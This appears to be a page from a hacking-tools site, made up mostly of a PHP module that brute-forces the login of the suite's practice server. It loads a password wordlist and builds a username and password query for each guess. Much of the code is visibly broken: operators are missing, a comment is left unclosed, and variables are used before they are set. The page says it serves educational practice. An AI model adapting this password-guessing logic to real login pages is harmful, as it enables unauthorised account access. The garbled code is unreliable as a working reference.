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..we will make a new module and not just some new module, nope let's make a fully automatic injection script! This tutorial is the first step into making this. Let's first explain what..

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THC Sscan

THC Sscan is a very versatile tool for scanning (html) files

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Bruteforce the TestServer

Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 12-11-2014
// properties for this callback
$_CBACKD = array("Attack THC_HS Login","callbackbf.php");
// we still want the callback to work when the username or the success message changes
$aAttackVars file($_PATHS['config_root']."/login_single_user.php");
$aAttackVarsU explode("|",$aAttackVars[4]);
$aAttackVarsS explode("|",$aAttackVars[8]);
$aGlobalConfig = array();
$aGlobalConfig['user'] = trim($aAttackVarsU[1]);
$aGlobalConfig['success'] = trim($aAttackVarsS[1]);
/* variable properties */
// visibility: [0] => hidden, [1] => visible, [2] => don't do anything
$_CBACKV = array();
$_CBACKV[0] = array();
$_CBACKV[0]['value'] = @str_replace("Modules/thc_ss/","",$_PATHS['servers_root_http'])."/login_single_user.php";
$_CBACKV[0]['row'] = "a1";
$_CBACKV[0]['fieldclass'] = "a1f";
$_CBACKV[0]['visibility'] = 0;
$_CBACKV[1] = array();
// set to zero, bcoz we wanna be as fast as possible when bruteforcing
$_CBACKV[1]['value'] = "0";
$_CBACKV[1]['row'] = "a2";
$_CBACKV[1]['fieldclass'] = "a2f";
$_CBACKV[1]['visibility'] = 0;
$_CBACKV[2] = array();
$_CBACKV[2]['value'] = $aGlobalConfig['success'];
$_CBACKV[2]['fieldclass'] = "a5f";
$_CBACKV[2]['row'] = "a4";
$_CBACKV[2]['visibility'] = 0;
$_CBACKV[3] = array();
$_CBACKV[3]['value'] = "post";
$_CBACKV[3]['row'] = "a5";
$_CBACKV[3]['fieldclass'] = "a6f";
$_CBACKV[3]['visibility'] = 0;
$_CBACKV[4] = array();
$_CBACKV[4]['value'] = 1;
$_CBACKV[4]['row'] = "a6";
$_CBACKV[4]['fieldclass'] = "scanf";
$_CBACKV[4]['visibility'] = 2;
$_CBACKV[5] = array();
// empty won't set any value
$_CBACKV[5]['value'] = "";
$_CBACKV[5]['row'] = "callbackfunction";
$_CBACKV[5]['fieldclass'] = "callbackfunctionf";
$_CBACKV[5]['visibility'] = 1;
/* Script that brute forces the testserver of the hacksuite
    Callbck must always produce a query string, which will be passed back to the SScan module so it can be attached to the query string.
    NOTE 1: this function uses global variables in order to construct the string which will be added to the query.
    NOTE 2: settings from the thc_ss scan will automatically be adjusted to thc_hs' html login
    NOTE 3: don't rewrite this function, instead make a new one with the same name
    STRING: query string OR break key word BREAK
// break script
$sString "user=".$aGlobalConfig['user']."&pass=".trim($aListWord[$iOffsetKeyword]);
// load thc wordlist
if(false===($aListWord = @file($_PATHS['wordlists_root']."/pw_a.txt"))){
$sOut."You need the wordlist associated with the login_single_user.php server.".$sEnd);
$iOffsetKeyword 0;
// dissect the target
$aUrl = @parse_url($_CBACKV[0]['value']);
// set loops variable
$iLoops count($aListWord);
// make a copy of the old query
$aUrl['queryold'] = (isset($aUrl['query']) && $aUrl['query']!="" $aUrl['queryold'] : "");
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It takes lots of calories in order to create new things for the hacksuite, so it would be grand if you could buy me a protein shake or extra energy to keep me going. Thanks!
We are not responsible for any direct or indirect damage caused by abusing the tools provided on hacksuite.com. The suite is developed for educational purposes, use at your own risk!
Created by Remco Kouw. Powered by protein shakes and a high calorie diet.